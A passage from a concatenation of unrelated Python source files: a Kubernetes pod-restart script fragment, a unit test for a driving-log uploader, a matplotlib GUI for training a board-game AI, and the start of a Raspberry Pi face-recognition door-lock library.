for pod in pods.items:
if pod.status.phase == 'Running':
if get_pod_runtime(pod) > max_age:
return True
return False
def get_pod_runtime(pod: client.V1Pod):
return datetime.utcnow() - pod.metadata.creation_timestamp.replace(tzinfo=None)
def restart_managed_object(ctx, obj: typing.Union[client.V1Deployment, client.V1DaemonSet]):
restarted_on = time_to_str(datetime.utcnow())
obj.spec.template.metadata.annotations[ctx.obj['restart_label']] = restarted_on
apps = client.AppsV1Api()
if isinstance(obj, (client.V1Deployment,)):
apps.patch_namespaced_deployment(
name=obj.metadata.name,
namespace=obj.metadata.namespace,
body=obj,
)
elif isinstance(obj, (client.V1DaemonSet,)):
apps.patch_namespaced_daemon_set(
name=obj.metadata.name,
namespace=obj.metadata.namespace,
body=obj,
)
if __name__ == '__main__':
reaper()
|
test_uploader.py
|
#!/usr/bin/env python3
import os
import time
import threading
import unittest
import logging
import json
from selfdrive.swaglog import cloudlog
import selfdrive.loggerd.uploader as uploader
from common.xattr import getxattr
from selfdrive.loggerd.tests.loggerd_tests_common import UploaderTestCase
class TestLogHandler(logging.Handler):
def __init__(self):
logging.Handler.__init__(self)
self.reset()
def reset(self):
self.upload_order = list()
self.upload_ignored = list()
def emit(self, record):
try:
j = json.loads(record.getMessage())
if j["event"] == "upload_success":
self.upload_order.append(j["key"])
if j["event"] == "upload_ignored":
self.upload_ignored.append(j["key"])
except Exception:
pass
log_handler = TestLogHandler()
cloudlog.addHandler(log_handler)
class TestUploader(UploaderTestCase):
def setUp(self):
super().setUp()
log_handler.reset()
def start_thread(self):
self.end_event = threading.Event()
self.up_thread = threading.Thread(target=uploader.uploader_fn, args=[self.end_event])
self.up_thread.daemon = True
self.up_thread.start()
def join_thread(self):
self.end_event.set()
self.up_thread.join()
def gen_files(self, lock=False, boot=True):
f_paths = list()
for t in ["qlog.bz2", "rlog.bz2", "dcamera.hevc", "fcamera.hevc"]:
f_paths.append(self.make_file_with_data(self.seg_dir, t, 1, lock=lock))
if boot:
f_paths.append(self.make_file_with_data("boot", f"{self.seg_dir}.bz2", 1, lock=lock))
return f_paths
def gen_order(self, seg1, seg2, boot=True):
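# Build the expected upload priority: boot logs first, then qlogs, then rlogs, and finally
# the larger camera files, with entries inside each group following the given segment order.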
keys = []
if boot:
keys += [f"boot/{self.seg_format.format(i)}.bz2" for i in seg1]
keys += [f"boot/{self.seg_format2.format(i)}.bz2" for i in seg2]
keys += [f"{self.seg_format.format(i)}/qlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/qlog.bz2" for i in seg2]
keys += [f"{self.seg_format.format(i)}/rlog.bz2" for i in seg1]
keys += [f"{self.seg_format2.format(i)}/rlog.bz2" for i in seg2]
for i in seg1:
keys += [f"{self.seg_format.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
for i in seg2:
keys += [f"{self.seg_format2.format(i)}/{f}" for f in ['fcamera.hevc', 'dcamera.hevc']]
return keys
def test_upload(self):
self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "Not all files were uploaded")
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_upload_ignored(self):
self.set_ignore()
self.gen_files(lock=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
exp_order = self.gen_order([self.seg_num], [])
self.assertTrue(len(log_handler.upload_order) == 0, "Some files were not ignored")
self.assertFalse(len(log_handler.upload_ignored) < len(exp_order), "Some files failed to ignore")
self.assertFalse(len(log_handler.upload_ignored) > len(exp_order), "Some files were ignored twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "Not all files were ignored")
self.assertTrue(log_handler.upload_ignored == exp_order, "Files ignored in wrong order")
def test_upload_files_in_create_order(self):
seg1_nums = [0, 1, 2, 10, 20]
for i in seg1_nums:
self.seg_dir = self.seg_format.format(i)
self.gen_files(boot=False)
seg2_nums = [5, 50, 51]
for i in seg2_nums:
self.seg_dir = self.seg_format2.format(i)
self.gen_files(boot=False)
exp_order = self.gen_order(seg1_nums, seg2_nums, boot=False)
self.start_thread()
# allow enough time that files could upload twice if there is a bug in the logic
time.sleep(5)
self.join_thread()
self.assertTrue(len(log_handler.upload_ignored) == 0, "Some files were ignored")
self.assertFalse(len(log_handler.upload_order) < len(exp_order), "Some files failed to upload")
self.assertFalse(len(log_handler.upload_order) > len(exp_order), "Some files were uploaded twice")
for f_path in exp_order:
self.assertTrue(getxattr(os.path.join(self.root, f_path), uploader.UPLOAD_ATTR_NAME), "Not all files were uploaded")
self.assertTrue(log_handler.upload_order == exp_order, "Files uploaded in wrong order")
def test_no_upload_with_lock_file(self):
self.start_thread()
time.sleep(0.25)
f_paths = self.gen_files(lock=True, boot=False)
# allow enough time that files should have been uploaded if they would be uploaded
time.sleep(5)
self.join_thread()
for f_path in f_paths:
self.assertFalse(getxattr(f_path, uploader.UPLOAD_ATTR_NAME), "File upload when locked")
def test_clear_locks_on_startup(self):
f_paths = self.gen_files(lock=True, boot=False)
self.start_thread()
time.sleep(1)
self.join_thread()
for f_path in f_paths:
self.assertFalse(os.path.isfile(f_path + ".lock"), "File lock not cleared on startup")
if __name__ == "__main__":
unittest.main(failfast=True)
|
main.py
|
# import matplotlib
# print(matplotlib.get_backend())
# print(matplotlib.is_interactive())
# matplotlib.use('Qt4Agg')
import os
import glob
import copy
import datetime
import random
from threading import Thread
import matplotlib.patches as patches
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from six.moves import queue
from tentacle.config import cfg
from tentacle.board import Board
from tentacle.game import Game
from tentacle.server import net
from tentacle.strategy import StrategyHuman
from tentacle.strategy import StrategyMC
# from tentacle.strategy import StrategyNetBot
# from tentacle.strategy import StrategyMCTS1
from tentacle.strategy import StrategyMinMax
from tentacle.strategy import StrategyTD, StrategyRand
from tentacle.strategy_dnn import StrategyDNN
WORK_DIR = cfg.WORK_DIR
SL_BRAIN_DIR = cfg.BRAIN_DIR
RL_BRAIN_DIR = cfg.RL_BRAIN_DIR
STAT_FILE = cfg.STAT_FILE
FILE_PREFIX = cfg.FILE_PREFIX
class Gui(object):
STATE_IDLE = 0
STATE_TRAINING = 1
STATE_PLAY = 2
RESULT_MSG = {Board.STONE_BLACK: 'Black Win',
Board.STONE_WHITE: 'White Win',
Board.STONE_EMPTY: 'Draw'}
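# Keyboard shortcuts handled in _key_press: 1/2 load TD brains (black/white), 3 save them,
# 4/5 load MC brains, t self-play training, r learn from two MinMax teachers,
# f2/f3 play as black/white against the AI, m run a match, f4 reinforcement learning,
# f5 join a network match, f12 pause.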
def __init__(self):
size = Board.BOARD_SIZE
keymap = [k for k in plt.rcParams.keys() if k.startswith('keymap.')]
for k in keymap:
plt.rcParams[k] = ''
self.fig = plt.figure(figsize=((size + 1) / 2.54, (size + 1) / 2.54), facecolor='#FFE991')
self.fig.canvas.set_window_title('Training')
span = 1. / (size + 1)
self.ax = self.fig.add_axes((span, span, (size - 1) * span, (size - 1) * span),
aspect='equal',
axis_bgcolor='none',
xticks=range(size),
yticks=range(size),
xticklabels=[chr(ord('A') + i) for i in range(size)],
yticklabels=range(1, 1 + size))
self.ax.grid(color='k', linestyle='-', linewidth=1)
self.ax.set_title('press T for training')
self.black_stone = patches.Circle((0, 0), .45,
facecolor='#131814', edgecolor=(.8, .8, .8, 1),
linewidth=2, clip_on=False, zorder=10)
self.white_stone = copy.copy(self.black_stone)
self.white_stone.set_facecolor('#FCF5F4')
self.white_stone.set_edgecolor((.5, .5, .5))
self.fig.canvas.mpl_connect('key_press_event', self._key_press)
self.fig.canvas.mpl_connect('close_event', self._handle_close)
# self.fig.canvas.mpl_connect('button_press_event', self._button_press)
self.state = Gui.STATE_IDLE
self.strategy_1 = None
self.strategy_2 = None
self.game = None
self.all_stones = []
self.oppo_pool = []
self.msg_queue = queue.Queue(maxsize=100)
self.timer = self.fig.canvas.new_timer(interval=50)
self.timer.add_callback(self.on_update)
self.timer.start()
plt.show()
def _handle_close(self, event):
if self.strategy_1 is not None:
self.strategy_1.close()
if self.strategy_2 is not None:
self.strategy_2.close()
def _key_press(self, event):
# print('press', event.key)
if event.key == '0':
# clear
pass
elif event.key == 'e':
# edit mode
pass
elif event.key == '1':
self.strategy_1 = StrategyTD(1, 1)
self.strategy_1.load('./brain1.npz')
self.strategy_1.stand_for = Board.STONE_BLACK
elif event.key == '2':
self.strategy_2 = StrategyTD(1, 1)
self.strategy_2.load('./brain2.npz')
self.strategy_2.stand_for = Board.STONE_WHITE
elif event.key == '3':
self.strategy_1.save('./brain1.npz')
self.strategy_2.save('./brain2.npz')
elif event.key == '4':
self.strategy_1 = StrategyMC()
self.strategy_1.load('./brain1.npz')
self.strategy_1.stand_for = Board.STONE_BLACK
elif event.key == '5':
self.strategy_2 = StrategyMC()
self.strategy_2.load('./brain2.npz')
self.strategy_2.stand_for = Board.STONE_WHITE
elif event.key == 't':
self.state = Gui.STATE_TRAINING
Game.on_training = True
s1, s2 = self.init_both_sides()
self.train1(s1, s2) # god view
elif event.key == 'r':
self.learn_from_2_teachers()
elif event.key == 'f2':
self.state = Gui.STATE_PLAY
Game.on_training = False
self.vs_human(Board.STONE_BLACK)
elif event.key == 'f3':
self.state = Gui.STATE_PLAY
Game.on_training = False
self.vs_human(Board.STONE_WHITE)
elif event.key == 'f1':
pass
elif event.key == 'm':
self.match()
elif event.key == 'f4':
self.reinforce()
elif event.key == 'f5':
self.join_net_match()
elif event.key == 'f12':
plt.pause(600)
def _button_press(self, event):
if self.state != Gui.STATE_PLAY:
return
if not self.game.wait_human:
return
if (event.xdata is None) or (event.ydata is None):
return
i, j = map(round, (event.xdata, event.ydata))
# print('click at(%d, %d)' % (i, j))
def which_one(self, which_side):
if self.strategy_1 is not None and self.strategy_1.stand_for == which_side:
return self.strategy_1
elif self.strategy_2 is not None and self.strategy_2.stand_for == which_side:
return self.strategy_2
return None
def vs_human(self, which_side_human_play):
strategy = self.which_one(Board.oppo(which_side_human_play))
if strategy is None or isinstance(strategy, StrategyRand):
strategy = self.which_one(which_side_human_play)
if strategy is None:
print('without opponent')
return
old_is_learning, old_stand_for = strategy.is_learning, strategy.stand_for
strategy.is_learning, strategy.stand_for = False, Board.oppo(which_side_human_play)
s1 = strategy
s2 = StrategyHuman()
s2.stand_for = which_side_human_play
self.game = Game(Board(), s1, s2, self.msg_queue)
self.game.step_to_end()
strategy.is_learning, strategy.stand_for = old_is_learning, old_stand_for
def clear_board(self):
print('\nclear board\n')
for s in self.all_stones:
s.remove()
self.all_stones.clear()
def show(self, who, loc):
i, j = divmod(loc, Board.BOARD_SIZE)
s = None
if who == Board.STONE_BLACK:
s = copy.copy(self.black_stone)
elif who == Board.STONE_WHITE:
s = copy.copy(self.white_stone)
s.center = (i, j)
self.all_stones.append(s)
self.ax.add_patch(s)
def measure_perf(self, s1, s2):
old_epsilon1, old_is_learning1, old_stand_for1 = s1.epsilon, s1.is_learning, s1.stand_for
# old_epsilon2, old_is_learning2, old_stand_for2 = s2.epsilon, s2.is_learning, s2.stand_for
old_is_learning2, old_stand_for2 = s2.is_learning, s2.stand_for
s1.epsilon, s1.is_learning, s1.stand_for = 0, False, Board.STONE_BLACK
# s2.epsilon, s2.is_learning, s2.stand_for = 0, False, Board.STONE_WHITE
s2.is_learning, s2.stand_for = False, Board.STONE_WHITE
s3 = StrategyRand()
probs = [0, 0, 0, 0, 0, 0]
games = 3 # 30
for i in range(games):
# the learner s1 moves first (plays black)
s1.stand_for = Board.STONE_BLACK
s2.stand_for = Board.STONE_WHITE
g = Game(Board(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_BLACK:
probs[0] += 1
elif g.winner == Board.STONE_EMPTY:
probs[1] += 1
# the learner s1 moves second (plays white)
s1.stand_for = Board.STONE_WHITE
s2.stand_for = Board.STONE_BLACK
g = Game(Board(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_WHITE:
probs[2] += 1
elif g.winner == Board.STONE_EMPTY:
probs[3] += 1
# the learner s1 moves first vs. a random opponent
s1.stand_for = Board.STONE_BLACK
s3.stand_for = Board.STONE_WHITE
g = Game(Board(), s1, s3)
g.step_to_end()
if g.winner == Board.STONE_BLACK:
probs[4] += 1
# the learner s1 moves second vs. a random opponent
s1.stand_for = Board.STONE_WHITE
s3.stand_for = Board.STONE_BLACK
g = Game(Board(), s1, s3)
g.step_to_end()
if g.winner == Board.STONE_WHITE:
probs[5] += 1
probs = [i / games for i in probs]
print(probs)
s1.epsilon, s1.is_learning, s1.stand_for = old_epsilon1, old_is_learning1, old_stand_for1
# s2.epsilon, s2.is_learning, s2.stand_for = old_epsilon2, old_is_learning2, old_stand_for2
s2.is_learning, s2.stand_for = old_is_learning2, old_stand_for2
return probs
def draw_perf(self, perf):
series = ['black win', 'black draw', 'white win', 'white draw', 'PvR 1st', 'PvR 2nd']
colors = ['r', 'b', 'g', 'c', 'm', 'y']
plt.figure()
axes = plt.gca()
axes.set_ylim([-0.1, 1.1])
for i in range(1, len(perf)):
plt.plot(perf[0], perf[i], label=series[i - 1], color=colors[i - 1])
plt.legend(loc='upper left', bbox_to_anchor=(1, 1))
plt.show()
# plt.savefig('selfplay_random_{0}loss.png'.format(p1.lossval))
plt.figure(self.fig.number)
def init_both_sides(self):
# feat = Board.BOARD_SIZE_SQ * 2 + 2
# if self.strategy_1 is None:
# s1 = StrategyTD(feat, feat * 2)
# s1.stand_for = Board.STONE_BLACK
# s1.alpha = 0.3
# s1.beta = 0.3
# s1.lambdaa = 0.05
# s1.epsilon = 0.3
# self.strategy_1 = s1
# else:
# s1 = self.strategy_1
# s1.epsilon = 0.3
if self.strategy_1 is None:
# s1 = StrategyMC()
# s1 = StrategyANN(feat, feat * 2)
file = tf.train.latest_checkpoint(RL_BRAIN_DIR)
s1 = StrategyDNN(from_file=file, part_vars=True)
# s1 = StrategyMCTS1()
self.strategy_1 = s1
else:
s1 = self.strategy_1
s1.is_learning = True
s1.stand_for = Board.STONE_BLACK
# if self.strategy_2 is None:
# s2 = StrategyTD(feat, feat * 2)
# s2.stand_for = Board.STONE_WHITE
# self.strategy_2 = s2
# else:
# s2 = self.strategy_2
# s2.is_learning = False
s2 = StrategyRand()
# s2 = StrategyMinMax()
s2.stand_for = Board.STONE_WHITE
self.strategy_2 = s2
return s1, s2
def match(self):
s1, s2 = self.strategy_1, self.strategy_2
print('player1:', s1.__class__.__name__)
print('player2:', s2.__class__.__name__)
probs = np.zeros(6)
games = 100 # 30
for i in range(games):
print(i)
s1.stand_for = Board.STONE_BLACK
s2.stand_for = Board.STONE_WHITE
g = Game(Board.rand_generate_a_position(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_BLACK:
probs[0] += 1
elif g.winner == Board.STONE_WHITE:
probs[1] += 1
else:
probs[2] += 1
s1.stand_for = Board.STONE_WHITE
s2.stand_for = Board.STONE_BLACK
g = Game(Board.rand_generate_a_position(), s1, s2)
g.step_to_end()
if g.winner == Board.STONE_WHITE:
probs[3] += 1
elif g.winner == Board.STONE_BLACK:
probs[4] += 1
else:
probs[5] += 1
print('total play:', games)
print(probs)
def train1(self, s1, s2):
'''Train for one epoch of self-play games.
Returns:
------------
(winner, win_prob) : tuple
the winning Strategy and the fraction of games it won
'''
max_explore_rate = 0.95
win1, win2, draw = 0, 0, 0
step_counter, explo_counter = 0, 0
begin = datetime.datetime.now()
episodes = 1
# samples = 100
# interval = episodes // samples
# perf = [[] for _ in range(7)]
learner = s1 if s1.is_learning else s2
# oppo = self.which_one(Board.oppo(learner.stand_for))
stat_win = []
# past_me = learner.mind_clone()
for i in range(episodes):
# if (i + 1) % interval == 0:
# print(np.allclose(s1.hidden_weights, past_me.hidden_weights))
# probs = self.measure_perf(learner, oppo)
# perf[0].append(i)
# for idx, x in enumerate(probs):
# perf[idx + 1].append(x)
learner.epsilon = max_explore_rate * np.exp(-5 * i / episodes) # * (1 if i < episodes//2 else 0.3) #
g = Game(Board(), s1, s2)
g.step_to_end()
win1 += 1 if g.winner == Board.STONE_BLACK else 0
win2 += 1 if g.winner == Board.STONE_WHITE else 0
draw += 1 if g.winner == Board.STONE_EMPTY else 0
stat_win.append(win1 - win2 - draw)
# rec.append(win1)
step_counter += g.step_counter
explo_counter += g.exploration_counter
# print('steps[%d], explos[%d]' % (g.step_counter, g.exploration_counter))
print('training...%d' % i)
total = win1 + win2 + draw
print("black win: %f" % (win1 / total))
print("white win: %f" % (win2 / total))
print("draw: %f" % (draw / total))
print('avg. steps[%f], avg. explos[%f]' % (step_counter / episodes, explo_counter / episodes))
end = datetime.datetime.now()
diff = end - begin
print("time cost[%f]s, avg.[%f]s" % (diff.total_seconds(), diff.total_seconds() / episodes))
# with open('stat-result-win.txt', 'w') as f:
# f.write(repr(stat_win))
# print(perf)
# self.draw_perf(perf)
# np.set_printoptions(threshold=np.nan, formatter={'float_kind' : lambda x: "%.4f" % x})
# with open('stat-result-net-train-errors.txt', 'w') as f:
# f.write(repr(np.array(s1.errors)))
winner = Board.STONE_BLACK if win1 >= win2 else Board.STONE_WHITE
return self.which_one(winner), max(win1, win2) / total
# plt.title('press F3 start')
# print(len(rec))
# plt.plot(rec)
def learn_from_2_teachers(self):
s1 = StrategyMinMax()
s1.stand_for = Board.STONE_BLACK
self.strategy_1 = s1
s2 = StrategyMinMax()
s2.stand_for = Board.STONE_WHITE
self.strategy_2 = s2
observer = StrategyMC()
win1, win2, draw = 0, 0, 0
step_counter, explo_counter = 0, 0
begin = datetime.datetime.now()
episodes = 10000
for i in range(episodes):
g = Game(Board(), s1, s2, observer=observer)
g.step_to_end()
win1 += 1 if g.winner == Board.STONE_BLACK else 0
win2 += 1 if g.winner == Board.STONE_WHITE else 0
draw += 1 if g.winner == Board.STONE_EMPTY else 0
step_counter += g.step_counter
explo_counter += g.exploration_counter
print('training...%d' % i)
total = win1 + win2 + draw
print("black win: %f" % (win1 / total))
print("white win: %f" % (win2 / total))
print("draw: %f" % (draw / total))
print('avg. steps[%f], avg. explos[%f]' % (step_counter / episodes, explo_counter / episodes))
end = datetime.datetime.now()
diff = end - begin
print("time cost[%f]s, avg.[%f]s" % (diff.total_seconds(), diff.total_seconds() / episodes))
observer.save('./brain1.npz')
def from_new_start_point(self, winner, s1, s2):
'''
Returns:
------------
s1 : Strategy
the learner
s2 : Strategy
the teacher
'''
if s1 == winner:
s2 = s1.mind_clone()
if s2 == winner:
s1 = s2.mind_clone()
# way 1: s1 follow the winner's stand-for
s1.stand_for = winner.stand_for
# way 2: s1 switch to another stand-for of winner
# s1.stand_for = Board.oppo(winner.stand_for)
# way 3: s1 random select stand-for
# s1.stand_for = np.random.choice(np.array([Board.STONE_BLACK, Board.STONE_WHITE]))
s2.stand_for = Board.oppo(s1.stand_for)
s1.is_learning = True
s2.is_learning = False
return s1, s2
def train2(self):
'''train many times
'''
s1, s2 = self.init_both_sides()
win_probs = []
begin = datetime.datetime.now()
counter = 0
while True:
print('epoch...%d' % counter)
winner, win_prob = self.train1(s1, s2)
win_probs.append(win_prob)
counter += 1
if counter >= 10:
break
s1, s2 = self.from_new_start_point(winner, s1, s2)
end = datetime.datetime.now()
diff = end - begin
print("total time cost[%f] hour" % (diff.total_seconds() / 3600))
print('win probs: ', win_probs)
plt.title('press F3 start')
def reinforce(self, resume=True):
self.oppo_pool = self.get_mindsets(RL_BRAIN_DIR, FILE_PREFIX)
part_vars = True
if resume and len(self.oppo_pool) != 0:
file = tf.train.latest_checkpoint(RL_BRAIN_DIR)
part_vars = False
else:
file = tf.train.latest_checkpoint(SL_BRAIN_DIR)
part_vars = True
s1 = StrategyDNN(is_train=False, is_revive=True, is_rl=True, from_file=file, part_vars=part_vars)
print('I was born from', file)
if len(self.oppo_pool) != 0:
file = random.choice(self.oppo_pool)
file = os.path.join(RL_BRAIN_DIR, file)
part_vars = False
else:
file = tf.train.latest_checkpoint(SL_BRAIN_DIR)
part_vars = True
s2 = StrategyDNN(is_train=False, is_revive=True, is_rl=False, from_file=file, part_vars=part_vars)
print('vs.', file)
stat = []
# n_lose = 0
iter_n = 100
for i in range(iter_n):
print('iter:', i)
win1, win2, draw = 0, 0, 0
step_counter, explo_counter = 0, 0
episodes = cfg.REINFORCE_PERIOD
for _ in range(episodes):
s1.stand_for = random.choice([Board.STONE_BLACK, Board.STONE_WHITE])
s2.stand_for = Board.oppo(s1.stand_for)
g = Game(Board.rand_generate_a_position(), s1, s2, observer=s1)
g.step_to_end()
win1 += 1 if g.winner == s1.stand_for else 0
win2 += 1 if g.winner == s2.stand_for else 0
draw += 1 if g.winner == Board.STONE_EMPTY else 0
# print('winner: {:d}, stand for: {:d}'.format(g.winner, s1.stand_for))
s1.win_ratio = win1 / win2 if win2 != 0 else 1.
step_counter += g.step_counter
explo_counter += g.exploration_counter
if s1.win_ratio > 1.1:
file = FILE_PREFIX + '-' + str(i)
s1.mind_clone(os.path.join(RL_BRAIN_DIR, FILE_PREFIX), i)
self.oppo_pool.append(file)
file = random.choice(self.oppo_pool)
file = os.path.join(RL_BRAIN_DIR, file)
s2.close()
s2 = StrategyDNN(is_train=False, is_revive=True, is_rl=False, from_file=file, part_vars=False)
print('vs.', file)
# n_lose = 0
# elif win1 < win2:
# n_lose += 1
# if n_lose >= 50:
# break
if i % 1 == 0 or i + 1 == iter_n:
total = win1 + win2 + draw
win1_r = win1 / total
win2_r = win2 / total
draw_r = draw / total
print("iter:%d, win: %.3f, lose: %.3f, draw: %.3f, t: %.3f" % (i, win1_r, win2_r, draw_r, s1.temperature))
stat.append([win1_r, win2_r, draw_r])
print('avg. steps[%f], avg. explos[%f]' % (step_counter / episodes, explo_counter / episodes))
if i % 10 == 0 or i + 1 == iter_n:
np.savez(STAT_FILE, stat=np.array(stat))
print('rl done. you can try it.')
self.strategy_1 = self.strategy_2 = s1
def get_mindsets(self, folder, prefix):
mindsets = set()
pattern = os.path.join(folder, prefix) + '*'
listing = glob.glob(pattern)
for f in listing:
mindsets.add(os.path.splitext(os.path.basename(f))[0])
return list(mindsets)
def on_update(self):
i = 0
redraw = False
while True:
msg = None
try:
msg = self.msg_queue.get_nowait()
except queue.Empty:
break
if msg is None:
break
# print(msg[0], ' ', msg[1] if len(msg) > 1 else '')
if msg[0] == 'start':
self.clear_board()
redraw = True
elif msg[0] == 'move':
self.show(msg[1], msg[2])
redraw = True
elif msg[0] == 'end':
self.ax.set_title(Gui.RESULT_MSG[msg[1]])
redraw = True
self.msg_queue.task_done()
i += 1
if i >= 5: # cap on the number of messages handled per timer tick
break
if redraw:
self.fig.canvas.draw()
def join_net_match(self):
net_t = Thread(target=net, args=(self.msg_queue,), daemon=True)
net_t.start()
if __name__ == '__main__':
gui = Gui()
|
libfidl.py
|
__author__ = "David Taschjian"
import click
import hashlib
import os
import json
import time
import RPi.GPIO as GPIO
from edgetpu.basic.basic_engine import BasicEngine
from edgetpu.classification.engine import ClassificationEngine
from edgetpu.learn.imprinting.engine import ImprintingEngine
from edgetpu.detection.engine import DetectionEngine
import cv2
import numpy as np
from PIL import Image
import threading
PROPERTY_FILE_PATH = './properties.json'
def hash(string, hashtype):
"""
This function returns a defined hash for a string
:param string: a string to hash
:type string: string
:param hashtype: The hashing function which should be used. It has to be defined in hashlib
:type hashtype: string
:return type: String representation of a hex number
"""
# hash the binary representation of the string and convert it to hex
return getattr(hashlib, hashtype)(string.encode()).hexdigest()
def load_properties():
"""
This function is loading the data from the property file and checking if anything is missing.
:return type: dictionary
"""
with open(PROPERTY_FILE_PATH) as f:
properties = json.load(f)
required_entries = {'user', 'classification', 'detection'}
missing_entries = required_entries - properties.keys()
if not len(missing_entries) == 0:
raise Exception('Properties corrupted! {} missing.'.format(str(missing_entries)))
return properties
def save_properties(data):
"""
Saves data to property file
"""
with open(PROPERTY_FILE_PATH, 'w') as f:
json.dump(data, f, sort_keys=True, indent=4)
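# Sketch of the properties.json layout implied by the accessors in this file (all values
# below are made-up examples, not the real configuration):
#   {
#     "user": {"alice": {"images": "./Faces/alice", "access": true}},
#     "classification": {"default_path": "...", "path": "...", "labels": "..."},
#     "detection": "./Models/face_detection.tflite"
#   }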
def user_exist(username):
"""
Checks if a user with the given username exists.
:param username: the name of a user
:type username: string
:return type: boolean
"""
#loading all user
user = load_properties()['user']
return username in user.keys()
class Username(click.ParamType):
"""
Custom Type class for click for usernames, to check for new usernames or for current usernames.
:param new: True if the class should check whether a new username is already taken
:type new: boolean
"""
def __init__(self, new=True):
self.new = new
def convert(self, value, param, ctx):
"""
This is a function used by click.
:param value: the username in interest
:type value : string
:return type: string
"""
if not isinstance(value, str):
self.fail(f"expected string for username, got {value!r} of type {type(value).__name__}", param, ctx)
if self.new:
if user_exist(value):
self.fail(f"{value!r} is already taken!", param, ctx)
else:
return value
else:
if user_exist(value):
return value
else:
self.fail(f"{value!r} does not exist!", param, ctx)
return value
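# Illustrative click usage (the command below is hypothetical, not part of this file):
#   @click.command()
#   @click.argument('username', type=Username(new=False))
#   def remove_user(username):
#       ...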
def process_user_pictures(props,source,destination):
click.echo('Fetching files...')
image_list = [f for f in os.listdir(source)
if os.path.isfile(os.path.join(source, f))]
detection = DetectionEngine(props['detection'])
click.echo('Looking for faces..')
found_faces = 0
for filename in image_list:
cv2_im = cv2.imread(os.path.join(source,filename))
pil_im = Image.fromarray(cv2_im)
#searching for faces in the picture
faces = detection.detect_with_image(pil_im,threshold = 0.1, top_k =3,keep_aspect_ratio=True,relative_coord=True)
click.echo('Found {} faces in {}'.format(len(faces),filename))
#check each face and append results to frame
height, width, _= cv2_im.shape
cnt = 0
for face in faces:
x0, y0, x1, y1 = face.bounding_box.flatten().tolist()
x0, y0, x1, y1 = int(x0*width), int(y0*height), int(x1*width), int(y1*height)
#crop out face from camera picture
face_im = cv2_im[y0:y1,x0:x1]
#save image
new_filename = filename[:filename.rfind('.')] + '_' + str(cnt) + '_' +filename[filename.rfind('.'):]
click.echo('Saving {}'.format(new_filename))
cv2.imwrite(os.path.join(destination,new_filename), face_im)
cnt += 1
found_faces += cnt
click.echo(click.style("Done! From {} images we could find {} faces ".format(len(image_list), found_faces), fg='green'))
def retrain_model(props):
"""
This function is using the Imprinting technique to retrain the model by only changing the last layer.
All existing classes are discarded (keep_classes=False) and the model is retrained on the current users.
"""
MODEL_PATH = props['classification']['default_path']
click.echo('Parsing data for retraining...')
train_set = {}
test_set = {}
for user in props['user'].keys():
image_dir = props['user'][user]['images']
images = [f for f in os.listdir(image_dir)
if os.path.isfile(os.path.join(image_dir, f))]
if images:
# allocate the number of images for training and validation
net_pictures = len(images)
click.echo(click.style('We found {} pictures for {}'.format(net_pictures, user), fg='green'))
while True:
k = int(click.prompt('How many pictures do you want for validating the training?'))
if k > 0.25*net_pictures:
click.echo(click.style('At most 25% ({} pictures) of the training data can be used for testing the model!'.format(int(0.25*net_pictures)), fg='yellow'))
elif k < 2:
click.echo(click.style('At least 2 pictures must be used for testing the model!', fg='yellow'))
else:
break
test_set[user] = images[:k]
assert test_set[user], 'No images to test [{}]'.format(user)
train_set[user] = images[k:]
assert train_set[user], 'No images to train [{}]'.format(user)
#get shape of model to retrain
tmp = BasicEngine(MODEL_PATH)
input_tensor = tmp.get_input_tensor_shape()
shape = (input_tensor[2], input_tensor[1])
# resizing pictures and creating a new labels map
train_input = []
labels_map = {}
for user_id, (user, image_list) in enumerate(train_set.items()):
ret = []
for filename in image_list:
with Image.open(os.path.join(props['user'][user]['images'],filename)) as img:
img = img.convert('RGB')
img = img.resize(shape, Image.NEAREST)
ret.append(np.asarray(img).flatten())
train_input.append(np.array(ret))
labels_map[user_id] = user
#Train model
click.echo('Start training')
engine = ImprintingEngine(MODEL_PATH, keep_classes=False)
engine.train_all(train_input)
click.echo(click.style('Training finished!', fg='green'))
# gathering old model file paths
old_model = props['classification']['path']
old_labels = props['classification']['labels']
#saving new model
props['classification']['path'] = './Models/model{}.tflite'.format(''.join(['_' + u for u in labels_map.values()]))
engine.save_model(props['classification']['path'])
#saving labels
props['classification']['labels'] = props['classification']['path'].replace('classification','labels').replace('tflite','json')
with open(props['classification']['labels'] , 'w') as f:
json.dump(labels_map, f, indent=4)
#Evaluating how well the retrained model performed
click.echo('Start evaluation')
engine = ClassificationEngine(props['classification']['path'])
top_k = 5
correct = [0] * top_k
wrong = [0] * top_k
for user, image_list in test_set.items():
for img_name in image_list:
img = Image.open(os.path.join(props['user'][user]['images'],img_name))
candidates = engine.classify_with_image(img, threshold=0.1, top_k=top_k)
recognized = False
for i in range(top_k):
if i < len(candidates) and user == labels_map[candidates[i][0]]:
recognized = True
if recognized:
correct[i] = correct[i] + 1
else:
wrong[i] = wrong[i] + 1
click.echo('Evaluation Results:')
for i in range(top_k):
click.echo('Top {} : {:.0%}'.format(i+1, correct[i] / (correct[i] + wrong[i])))
# TODO highlight with colors how well it performed
if not old_model == props['classification']['path'] and not old_labels == props['classification']['labels'] and (os.path.exists(old_labels) or os.path.exists(old_model)):
if not click.confirm('Do you want to keep old models?'):
os.remove(old_model)
os.remove(old_labels)
click.echo(click.style('Old models removed.', fg='green'))
#saving properties
save_properties(props)
def facial_recogntion(props, smartLock):
"""
Processing camera pictures with multiple AI's and executing background jobs.
This is the main loop for the Door Lock.
AI stages: Movement detection -> Face detection -> Face classification
:param props: Necessary predefined properties
:type props: Dictionary
